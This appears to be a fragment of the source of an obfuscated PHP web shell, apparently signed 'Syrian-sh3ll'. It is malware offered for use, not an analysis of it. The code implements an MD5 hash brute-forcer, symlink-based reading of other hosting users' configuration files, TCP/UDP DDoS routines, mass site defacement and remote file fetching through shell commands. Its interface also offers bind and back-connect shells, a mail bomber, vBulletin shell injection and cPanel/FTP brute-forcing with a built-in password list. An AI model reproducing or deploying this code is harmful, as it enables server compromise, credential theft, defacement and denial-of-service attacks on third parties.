}else { for ($i1ioi0Olloo0I0o1 = 0; $i1ioi0Olloo0I0o1 <= $c; $i1ioi0Olloo0I0o1++) { $iOoI1oOi0o0OlI0O[27] = $chars{$i1ioi0Olloo0I0o1}; if ($next <= 27) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i00o1O0il0OlIo11 = 0; $i00o1O0il0OlIo11 <= $c; $i00o1O0il0OlIo11++) { $iOoI1oOi0o0OlI0O[28] = $chars{$i00o1O0il0OlIo11}; if ($next <= 28) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i10110011oloIllO = 0; $i10110011oloIllO <= $c; $i10110011oloIllO++) { $iOoI1oOi0o0OlI0O[29] = $chars{$i10110011oloIllO}; if ($next <= 29) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i01ll0Oil1OoIlIo = 0; $i01ll0Oil1OoIlIo <= $c; $i01ll0Oil1OoIlIo++) { $iOoI1oOi0o0OlI0O[30] = $chars{$i01ll0Oil1OoIlIo}; if ($next <= 30) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i1o01o0lliOiII0i = 0; $i1o01o0lliOiII0i <= $c; $i1o01o0lliOiII0i++) { $iOoI1oOi0o0OlI0O[31] = $chars{$i1o01o0lliOiII0i}; if ($next <= 31) { result(implode($iOoI1oOi0o0OlI0O)); }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}} function result($iOoI1oOi0o0OlI0O) { global $dat, $date; $hash = $_POST['pass']; $iIiOiooolo0IlO1i = date("\110:i:s"); $illo1ooO1o1I0OOi = date("d:\x6d:\x59"); if(md5($iOoI1oOi0o0OlI0O)==$hash) { echo "[+] \103\162a\x63\x6b\145\144 !! P\141ss\x77\x6fr\144 i\x73: $iOoI1oOi0o0OlI0O"; exit; } } if(!$_POST['pass']){echo "\x59o\165 Fo\x72\147\157\164 S\157m\x65\x74\x68i\156\147 \x49m\160o\x72\x74\141n\164 !! .. Li\x6be \110a\x73\150 : ) .";} else { $pass=htmlspecialchars($pass); $pass=stripslashes($pass); $dat=date("H:i:s"); $date=date("d:m:Y"); i0i11l11O1I0IOIi(); } } elseif($_POST['AutoHackNow']) { chdir($_POST['autoHackDir']); if(file_exists('AutoHackConfig.txt')) { DeleteFile('AutoHackConfig.txt'); } $domainToHack = $_POST['domainToHack']; $domainToHack = str_replace("ht\x74\160://","",$domainToHack); $domainToHack = str_replace("\x77\x77\167","",$domainToHack); $ScriptType = $_POST['ScriptType']; $index = $_POST['index']; $scriptPath = $_POST['scriptPath']; $iioIiOli00iI0Ilo = iIll1ll1iOoIoloo($domainToHack); $iooillOl10IIiloI = iilI11l1o01IilIo($ScriptType); if(function_exists('symlink')) {symlink("/\x68o\x6d\x65/$iioIiOli00iI0Ilo/\160\x75bli\143_html$scriptPath$iooillOl10IIiloI",'AutoHackConfig.txt');} else{Exe("\154n -s /\150\x6f\x6d\145/$iioIiOli00iI0Ilo/\160u\142\x6c\x69\x63_h\x74m\x6c$scriptPath$iooillOl10IIiloI A\x75t\x6f\x48a\x63k\x43\157\156\x66\x69g.\x74\170\164"); } $file = file_get_contents('AutoHackConfig.txt' ,null , null , true); iii0li0iIOii1III('FileToInclude.txt',$file); iI11i0Il0iO0iooi('FileToInclude.txt',0644); include_once('FileToInclude.txt'); i01IiIiilloIOIOO(); } elseif($_POST['StartAttack']) { $url = $_POST['ipToAttack']; set_time_limit(0); echo "[+] \x73t\x61\x72\164\x69\156g o\x6e $url\n"; if($_POST['DDOSType'] == 'tcp'){i1lOlOi0I01ooOoo($url);} else if($_POST['DDOSType'] == 'udp'){iOIilO1iIolIl11l($url);} } if($_POST['changeDirectory']) { $directory = $_POST['directory']; $directory = str_replace("\\\\"," ",$directory); $directory = str_replace(" ","\\",$directory); chdir($directory); } elseif ($_POST['massDefaceNow']) { $ioIOlo1li1o0IoOI = io0li01lioliIl1i($_POST['massDir'],$_POST['massFileName'],$_POST['massIndex']); if($ioIOlo1li1o0IoOI == 'notfound'){echo 'Directory Not Found !!';} else if ($ioIOlo1li1o0IoOI == 'notperm'){echo 'Permission Denied !!';} } else if($_POST['doAction'] && ($_POST['someAction'] == 'DOSServer1')) {cx();} else if($_POST['doAction'] && ($_POST['someAction'] == 'DOSServer2')) {ilOi1ollol1Il0Oi();} if($_POST['getFile']) { $fileUrl = $_POST['fileUrl']; $getType = $_POST['getType']; if($getType == 'auto'){iloOl1lloloI1loI($fileUrl);} else{Exe("'".$getType." ".$fileUrl."'");} } echo ""; if($_POST['editFileSubmit'] && ($_POST['actionType'] == 'edit')) { echo " "; } echo " <\164\144 \x77\151\144\x74\150='30%' \x68\x65\x69\147\x68t='30'> <\x66or\x6d method='\120\x4f\x53T'><\x74\141\x62\x6ce \x77\151d\x74\x68='100%' \x68\x65i\x67\x68t='72' b\x6fr\x64\145r='0' \x69\144='\x42\x6fx'> <\x74d \x77i\144\164\x68='4%' \150\x65i\x67\150t='21' \163\164y\154e='\142\141c\x6bg\x72\x6f\x75\x6ed-col\x6f\x72:".$iIi1i11l11OoIlIl."'>&\156bs\x70; <\164\x64 \163\x74y\154e='\142ack\x67r\157un\x64-co\154\x6fr:#666;\x70\x61dd\151\156\x67-\x6c\145ft:10\160x;'>Comm\141nds Ali\141s <\x74\162><\164d \x68\x65\151\147\150\x74='45' \143\157l\163\160a\x6e='2'>";i0IilOl1iIl0llOi($os); echo " <\164\x64 \167\151\144\x74\x68='30%' \150e\151g\150t='30'> <\146\157r\x6d method='\120\x4f\123T'> <\164\x72> <\x74\x64 wid\x74h='4%' \150\145igh\x74='21' \163\x74\171\154\145='\x62a\x63\153g\162o\x75nd-col\x6f\162:".$iIi1i11l11OoIlIl."'>&\156b\x73p; <\x74\x64 s\164y\154\x65='b\x61\143k\x67\162o\165nd-co\154or:#666;p\141\144d\151n\147-\x6c\145\146t:10\160\x78;'>\x43\157\x6d\155a\156\x64 \114\x69\156\145 <\x74\x72><\164d \x68\145\151\147ht='45' \143o\154\163p\141\156='2'> <\164\144 w\151d\164\x68='30%' h\145\151\147h\164=30> <\x66o\x72\x6d method='P\x4f\x53\124'> &\x6e\142\x73p; \106i\154\x65\x73 & F\157\x6c\x64\145rs H\141\156d\154\151\156g <\164\162> <\144i\166 i\x64='newN\141\x6de'>&n\142s\160; <\164r> <\164\144 \167i\x64t\x68='30%'> <\x66o\x72\155 method='\x50O\x53\124'><\164ab\154\x65 \x77\151d\x74h='100%' \150\145\151g\150\x74='72' b\157\x72de\x72='0' \x69\x64='\102\157\x78'><\x74\162> <\x74\x64 \x77\x69\144\x74\150='4%' \150\145\x69\147h\x74='21' s\164\x79l\x65='ba\x63\x6b\x67\x72\157\x75\x6e\x64-\x63\x6f\x6cor:".$iIi1i11l11OoIlIl."'>&\156\x62\x73\160; <\164d \163\x74\171le='b\x61ckgro\x75nd-\143\x6f\154\x6f\x72:#666;p\x61\144d\x69n\147-\x6c\x65f\x74:10p\170;'>\x43\x68\141\156\x67e \115\x6f\x64e <\x74\162><\x74\x64 h\145\x69\147\150t='45' c\157\154s\160an='2'> <\x74\162> <\x74\144 \x77i\144th='4%' h\x65\151g\x68t='21' \x73t\x79le='\142\x61\x63\x6b\147\162\x6fu\x6ed-\143\x6fl\x6f\162:".$iIi1i11l11OoIlIl."'>&\156\x62\x73\160; \x47\145\x74 \106\151l\x65 <\164\x72><\164d \x68\x65i\x67h\164='45' \x63\x6fl\163\160a\x6e='2'> <\x73\x65\154\x65\143t name='getType'> <\x74\144> <\146or\155 method='\x50\117\x53T'><\x74\162> &\x6e\142\x73p; \102\x69n\144 \x43\157\156n\x65c\x74\151\x6f\x6e <\164\144 \150e\151g\150\164='45' col\x73\x70\x61\156='2'> <\x73e\x6c\145\x63t c\x6cas\163='\151\x6eputz' size='1' name='\165s\145' \x69\x64='b\151n\x64_\163\x65lect' \157n\x63\x68\141n\x67e='v\x69e\167\x50as\163();'> <\x64\151v \x69\x64='v\x69\x65w_b\151\x6ed_p\x61\x73s'>&n\142sp; <\x74r> <\x74\x64> <\x66\x6f\x72\x6d method='\x50\x4f\123T'><\164\141b\x6ce \x77\151\144t\150='100%' \x68\145\x69\147\x68\x74='72' \x62\x6f\162der='0' i\144='B\x6fx'><\164r> <\164d \x77i\144\x74h='4%' \150\x65\x69ght='21' \x73\x74y\x6c\145='\142\141\143k\x67\x72\157\165\156\x64-\x63ol\x6f\162:".$iIi1i11l11OoIlIl."'>&\156\x62\x73p; <\x74\144 s\x74y\x6c\145='\x62\141\143\153g\162o\x75\x6e\x64-c\157\154\157\162:#666;\x70\x61\144\144\151ng-\154\x65\146t:10\160x;'>C\x47\111 S\x63\162\x69pt\163 <\164\x72> <\164\144> <\146\x6f\162\155 method='\120\117\123T'><\x74\x61\x62\x6c\x65 \167i\x64\164\x68='100%' \150\x65\x69\x67\150t='72' \x62\x6f\162\144\x65\x72='0' \151\x64='B\x6f\x78'><\x74\162> <\164\144 \x77\x69\x64\x74\x68='4%' \150e\151\147ht='21' \163\x74yl\x65='b\141\x63\153gr\157\x75nd-\x63o\x6c\157r:".$iIi1i11l11OoIlIl."'>&\x6eb\x73\x70; \106o\x72\x62i\x64\144\x65\156 <\x74\x72><\x74d \150\145\151g\x68t='45' c\x6f\154s\x70a\x6e='2'> <\164\144> <\146o\162\x6d method='P\x4fST'><\x74\162> &\156\x62\x73\160; <\x74\144 \163ty\x6c\145='\142\141ckgro\x75\156\x64-co\154\x6f\x72:#666;\160\141\x64\x64\151\x6e\x67-\154\145\146t:10p\x78;'>\102\141\x63\x6b Co\x6e\156e\143\164\151o\x6e <\x74\162> <\x73el\145c\x74 name='\165se' \x69\144='b\x61c\153_se\154\145\143\x74' \157\x6ec\x68a\x6e\147\145='\166\x69\145\x77\x50a\x73s();'> &\156b\x73\160; <\164\x72> <\x74\x64> <\x74\x61\142l\x65 w\151\x64\x74\150='100%' \x68e\x69\147\150\x74='72' b\157r\144\x65\162='0' i\x64='\102\x6f\170'><\x74\x72> <\x74\x64 wi\144\164h='4%' \150e\151gh\x74='21' s\164\171\x6ce='ba\143\x6b\147r\x6f\x75\156\144-\x63\x6fl\157\x72:".$iIi1i11l11OoIlIl."'>&\156\142\163\160; <\164\144 \163t\171l\x65='\x62\x61\143\153\147r\x6fu\x6e\144-\x63o\154\x6f\162:#666;\160\141d\x64\151\156\147-l\145\x66t:10\160\x78;'>R\145\141\144\151\156\x67 \106ile\x73 & \104i\162 U\163\151\x6e\x67 \x50\110\x50 \102\165\x67\x73 <\x74r> <\x74\144> <\164\x61bl\145 \x77\151\144\164\150='100%' \x68\145i\147\x68t='72' \x62\157\162\x64\145r='0' \x69d='\x42\157\x78'> <\x74\x64 w\151\x64th='4%' h\x65i\x67ht='21' \x73\164\171le='\142\x61\143kg\162\x6fu\x6e\144-\x63\157l\x6f\x72:".$iIi1i11l11OoIlIl."'>&\156b\163\x70; <\x74\144 \x73\164y\154e='b\141c\x6b\147r\x6f\x75n\x64-\143\157\x6c\x6f\x72:#666;p\x61d\144\x69\x6e\x67-le\x66t:10p\x78;'>\123\143a\156\x6ee\x72\x73 \101\156d S\x74rin\x67s T\157ols <\164d h\x65\151\x67h\x74='45' c\157\x6c\x73\x70\141\x6e='2'> <\163el\x65\143\164 \151d='\x65\166\x61lO\162\x45\x6e\143' name='ev\141\154\117\x72Enc' o\156\143ha\156\147\145='e\x76\x61\x6c\x4f\162\x45\156\x63\062();'> <\164\144> <\x74\162> &n\142s\x70; <\x74\144 \163\x74\171le='\142\141\x63kg\x72\157u\x6ed-co\154\x6f\x72:#666;\x70\141\x64d\151ng-\x6c\x65\x66\x74:10\x70x;'>M\145\164\x61\x73p\x6co\151t \103o\156n\x65\143ti\157\156 <\164\x72><\164\x64 \x68e\x69g\150\164='45' co\x6csp\x61\x6e='2'> <\x74r> <\x74d> <\x66\x6frm method='\120\117\x53\x54'><\x74\x61\x62\x6c\x65 \x77\151d\164\150='100%' \x68e\151g\150\164='72' \x62\157rd\x65\x72='0' i\144='\102\x6f\170'><\164\162> <\164\144 \167i\144\164\150='4%' \x68\x65\151\147\150\164='21' \163\x74\x79\x6ce='b\141c\153\x67r\x6f\x75\x6e\x64-col\x6fr:".$iIi1i11l11OoIlIl."'>&\156\142s\160; <\x74d s\164\171l\145='b\x61\x63kg\x72\157\165n\x64-\143o\x6c\x6fr:#666;\x70\x61d\x64\151\156g-l\145\x66\164:10px;'>\104\104O\x53 \101\x74ta\143\x6be\162 <\164r><\x74\x64 h\x65i\x67\x68\x74='45' co\x6c\x73pa\156='2'> <\x73el\145ct name='DDO\x53\124\x79p\145'> <\164d> <\164\141b\x6ce \x77\x69dt\150='100%' he\x69gh\x74='72' \x62\157\162\144\x65\162='0' id='\x42\x6f\x78'><\x74\162> <\164\144 wid\x74h='4%' \150ei\147\x68t='21' s\x74y\x6c\145='\142ac\153\x67\162\x6f\165n\144-\x63olo\162:".$iIi1i11l11OoIlIl."'>&\156bsp; <\x74\144 \x73t\171\x6c\x65='b\141\x63k\147ro\165\156\144-c\157l\x6f\x72:#666;\x70\x61\x64\144\151\x6e\x67-\154e\146\164:10\160x;'>\125p\154o\141\144 \x46i\154\145\163 <\x74\x72><\164\144 \x68\x65i\x67\x68t='45' \x63\x6fl\163p\x61\x6e='2'> <\144i\x76 \x69d='\x75\x70l\x6f\141\144\111\x6ep\x75\x74'> <\146\x6fr\155 method='\120\x4f\x53\x54'><\164\x72>   \101C\x50 \106\x69\156de\162 <\x74r><\164d h\145i\147\x68\164='45' \x63o\x6c\163pa\156='2'> <\164\x72> <\164\x61b\154\x65 \167\x69\144\x74h='100%' hei\147\x68\x74='72' \142\157r\144\145\162='0' id='B\157\170'><\164r> &\156\142s\x70; <\x74d \163ty\154\x65='\142\x61\x63\153\147\x72\x6f\x75\156\x64-\x63o\x6c\x6f\x72:#666;p\141\x64\x64\x69\156\x67-l\x65\146\x74:10p\x78;'>\115\x61\163\163 \x44e\x66\141\143\x65\155\145\156\164<\x74\162><\164\144 \150\145i\x67h\164='45' c\x6f\154\x73\160\141\x6e='2'> <\x62r> <\x62r> <\164\144 v\141\x6c\151g\156='to\x70'> <\x66\157r\x6d method='\120O\123T' name='n\163\164'><\x74\x61\142l\145 w\151\144\x74h='100%' \150\x65\x69\x67\x68\164='72' \x62o\x72\144e\162='0' i\x64='\x42o\170'> <\x74\x64 w\151\144th='4%' he\x69g\150\164='21' \163\164\x79le='\142\x61\x63kgr\x6f\x75n\144-col\157\x72:".$iIi1i11l11OoIlIl."'>&n\x62\163\160; <\164d \163\164\x79\x6c\x65='bac\153\147\x72\x6f\x75\x6ed-c\157\154\x6f\162:#666;p\x61\x64d\151\x6e\147-\154\145ft:10p\170;'>MD\x35 C\162\x61\143k\x65\x72<\164\x72><\x74d \x68\145\x69\x67h\x74='45' col\x73\x70\x61\x6e='2'> <\x62r> <\142\162> \x45\x4e: a-\172 A-\132 0-9 \x53\x79m\142\x6f\x6cs <\146o\162\x6d method='P\117\x53\x54'><\x74\162> <\164d \x77\151d\x74h='4%' \150\x65\151\147\x68\164='21' s\x74\x79\x6c\145='b\141\143\x6bg\x72o\x75\156d-\143\157l\157r:".$iIi1i11l11OoIlIl."'>&n\x62\163\160; <\164\x64 \x73\164\x79\154e='b\141\x63\153\147\162\157\x75\156d-col\x6f\x72:#666;\x70a\x64din\x67-l\x65\x66\164:10\160x;'>\x46\141s\x74 T\157\x6fls <\164r> <\x73el\145\x63\164 name='\x73\x6f\x6de\x41\143t\x69\157n'> <\x74\x72> <\164\x64 v\x61\154i\147\156='\164\157\x70'> <\x74\141b\154\x65 \167i\x64th='100%' \150\145\x69\x67\x68\164='72' b\x6f\x72\144er='0' i\144='B\x6f\170'><\164r> <\164\x64 \x77i\x64\164\150='4%' \150\145\x69\147\150\164='21' s\x74\171\x6c\x65='\x62a\x63\x6bgrou\x6ed-\x63\157\154\x6f\x72:".$iIi1i11l11OoIlIl."'>&nb\163\x70; \x53\121\x4c<\x74\x72><\x74\144 \150\145i\x67ht='45' \143o\154s\x70\x61\x6e='2'>
<\163\x65\154\145\x63\164 \x69d='\123Q\x4c\124\x79\x70\145' name='\x53Q\x4cT\x79p\145' o\x6ec\150\141n\147\145='C\x68\141\x6e\147eS\x51\114Ty\160\145();'> <\x64\x69\x76 \x69\144='\151\156put\x54yp\145' >&\156\142s\x70; <\146\x6fr\155 method='POS\124'><\164\141bl\145 w\x69d\x74\x68='100%' \150\x65\x69ght='72' bor\144\x65r='0' \151\144='B\157\x78'><\x74\x72> &n\142sp; <\x74\144 \x73ty\154\x65='\142a\x63\x6b\x67r\157u\156\144-\143\157\x6c\157\162:#666;\160\141\x64\144in\x67-\154\145\146\164:10\160\170;'>\101u\164\x6f\x6da\164i\x63 \x48a\x63\153i\x6e\x67<\164\144 he\151\x67ht='45' \143\157\x6c\163pa\156='2'> <\142r /> <\164ex\164a\162\145\141 name='index' \143\157\x6c\163='50' rows='5' \x69\x64='\x49\156d\x65\x78' on\142\154\x75\162='\x42l\165r(\"In\144e\170\",\"\110a\x63\x6b\x65\144 \x42\x79 \123\x79\x52\151\101\156_3\064\1071\063\");' \x6f\x6e\x63\x6cic\x6b='C\154\x65\141\x72(\"\x49\156\144\145\x78\",\"Hac\153\145\x64 \102\x79 \x53\171\x52\151\x41\156_\x334\x47\061\063\");' >\x48\x61\x63\153\145\144 \102\x79 \123\171\x52\x69A\156_3\x34G13 <\x74\x64 \166\x61\154i\147\x6e='\x74\157\160'> <\x66\x6f\162\x6d method='\x50\x4f\x53\124'> <\164d \x77i\144\x74\x68='4%' he\151\147h\x74='21' sty\x6c\x65='\142ac\153\147\162\x6f\165\x6e\144-\143olor:".$iIi1i11l11OoIlIl."'>&nb\163\160; <\164\144 \x73\164\x79\154\x65='\142\x61\x63kgr\157\165nd-\x63o\154o\x72:#666;\160\141d\144\151\156\147-l\145\146\164:10\x70x;'>\115\x61\x69\x6c \x53\164or\x6d <\x74\162><\x74\x64 he\151g\150t='45' \143\x6fl\163\x70\141\156='2'> <\164\145\x78\164\x61re\141 rows='6' c\x6f\x6cs='45' name='Comments' i\x64='Comments' o\x6e\x62\x6c\165\x72='\x42\x6c\165\162(\"Comments\",\"\101\164\164\141\x63\x6b\x65\162 Message\");' o\156\143\154i\x63\x6b='\103\x6c\145\x61\162(\"Comments\",\"\x41t\164\141\x63k\145\x72 Message\");' >\101\164\164\141\143\x6be\162 Message <\164r> <\x74\x64 \166\x61\154ig\x6e='\x74o\160'> <\x74d w\151d\164\150='4%' h\x65i\147h\164='21' \x73\164\x79l\145='b\141\x63\153\147\x72o\x75\156d-\x63\157\x6c\x6fr:".$iIi1i11l11OoIlIl."'>&\x6eb\x73p; <\x74\x64 \x73\164\171\x6c\145='b\x61\x63\x6bg\162\x6f\165\156\x64-\143\157\154\x6fr:#666;\x70a\144\x64i\156g-l\145\x66\x74:10\x70x;'>\x5ao\x6e\x65-\x48 \x44\145\146\141\x63er<\x74\162><\x74\x64 hei\147ht='45' \143\x6f\154\163\x70\x61\156='2'>"; echo '

'; echo " <\x74d \166a\154\x69\x67n='\164\157\160'> <\x66\x6frm method='\120\x4f\x53T'><\x74\141\142\154e w\151\144t\150='100%' \150\145\151\147h\164='72' \142\x6f\x72\x64\145\162='0' \151d='B\157x'><\164r> <\164d \167\x69\144th='4%' \x68\145i\x67\x68\164='21' \163\164y\x6ce='b\x61c\153g\x72\x6fu\x6e\x64-\143\157lo\162:".$iIi1i11l11OoIlIl."'>&\x6eb\163\160; C\160a\156el \x41\156\144 \x46\124\120 B\x72\165\x74\x65\106\157\162\143\145 <\x74\x72><\x74\144 \x68\145\151g\x68\x74='45' \143\157l\x73\160\x61n='2'> <\164\145\x78\164a\162e\x61 rows='12' name='\165s\x65\x72s' c\157\x6c\x73='23' >"; system('ls /var/mail'); echo " 123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\n332211\n!@#$%^\n^%$#@!.\n!@#$%^&\n!@#$%^&*\n!@#$%^&*(\npassword\npasswd\n\160\141\163\163\167or\144s\npass\n\160@\141ss\1670r\x64\npass@\167\x6fr\x641 <\163y>\x43\x70\141n\x65\154 (2082) <\163\x79>\106\164p (21) <\x74d \x76\x61\x6c\x69g\156='\x74op'> <\146\x6f\162\155 method='\120\x4f\123\124'><\164a\x62\x6ce \167i\x64t\x68='100%' \x68\x65ig\x68\x74='72' b\157\162\x64er='0' \x69\144='\102\x6f\x78'> &\x6e\142sp; <\x74d \x73\x74\171le='\142a\143\x6b\147\162ou\156\x64-c\157\x6c\x6f\x72:#666;p\x61\x64\144\151n\147-\154\145\146\x74:10\160\170;'>\123\143\162\x69\160\164s Ha\x63\x6bi\156\x67<\164r> <\163\x65le\x63\x74 name ='ScriptType' \x69\144='ScriptType' o\156\143\x68\141\156\147\x65='S\x63\x72\x69p\x74s\x54\171\x70\x65();' > \x49\156\152\x65c\x74 \x53h3\154l ? <\x73e\154ec\164 name='\151\x6ej\145\143\x74\x53\150el\x6c' i\x64='\151n\152ectS\150\x65ll' \x6fn\x63h\x61\x6e\x67\x65='\x69n\152\x65\143t\x53h\x65\154\154Fu\156\x63t\151o\156();'><\x73\171> \126\102\x75\154\154\145\x74i\156 \117\156\x6cy ! <\163p\141n \x69\x64='\111\x6e\152\145\x63\x74\123\x68\145\154\154\x54y\160\x65\x53\160a\x6e'> <\144\151\x76 \151\144='\x53\x48\102'>\x50\165\x74 \x59\x6f\165r \111\156d\145\170 \x48\145\x72\145 ! "; ilI1iii00OiI00I1(); } if($_GET['id']=='about') { echo About(); if($_POST['sendEmail']) { $ip = $_POST['ip']; $httpref = $_POST['httpref']; $httpagent = $_POST['httpagent']; $visitor = $_POST['visitor']; $visitormail = $_POST['visitormail']; $notes = $_POST['notes']; $i10oio010Oi1OI0o = "\163\x7934@m\x73n.c\x6f\155"; if (eregi('http:', $notes)) { echo "\x61l\145\x72t('\164\x68\151\x73 \151\x73 \156ot al\154\x6fw\145\x64 !!');"; echo "<\163c\162\x69\x70t>hist\157r\x79.\x67\157(-1);"; } if(!$visitormail == "" && (!strstr($visitormail,"@") || !strstr($visitormail,"."))) { echo "<\163\x63r\151\x70\x74>\141l\145\162t('En\164\145\162 V\141\154\151\144 \105ma\151\154');\n"; echo "<\x73cr\151\x70\164>h\151\163tor\x79.\x67\157(-1);"; } if(empty($visitor) || empty($visitormail) || empty($notes )) { echo "<\x73cri\x70t>\x61l\145rt('A\154l \x46iel\144s \x41r\145 \122\x65\161\165\151\162ed !!'); "; echo "<\163\x63ri\x70t>h\x69\x73\164or\171.\x67\x6f(-1);"; } $iOIOl00O0li1oIIo = date("\x6c, \106 j, \131, \147:i a") ; $ioOi1OOooo10oI1o = "\116ew Message \x46\x72\157m \123\x79\162ia\x6e-s\150\063l\154 Users"; $notes = stripcslashes($notes); $message = " $iOIOl00O0li1oIIo [EST] \n Message: $notes \n Fr\x6fm: $visitor ($visitormail)\n \101\144\144i\x74\x69\157n\141\x6c \111n\146o : \x49\120 = $ip \n \102ro\x77\163e\162 \111\156f\x6f: $httpagent \n \122e\146\145\162\162\x61l : $httpref \n "; $from = "\106\162o\x6d: $visitormail\r\n"; mail($i10oio010Oi1OI0o, $ioOi1OOooo10oI1o, $message, $from); echo '

Date: '.$iOIOl00O0li1oIIo.'
Thank You : '.$visitor.' ( '.$visitormail.' )
Your Message Sent Successfully !
'; $iIiIi10oiOllIl1l = str_replace("\r", "<\x62\x72/>", $notes); echo $iIiIi10oiOllIl1l; echo '

'; } ilI1iii00OiI00I1(); } } ; ?>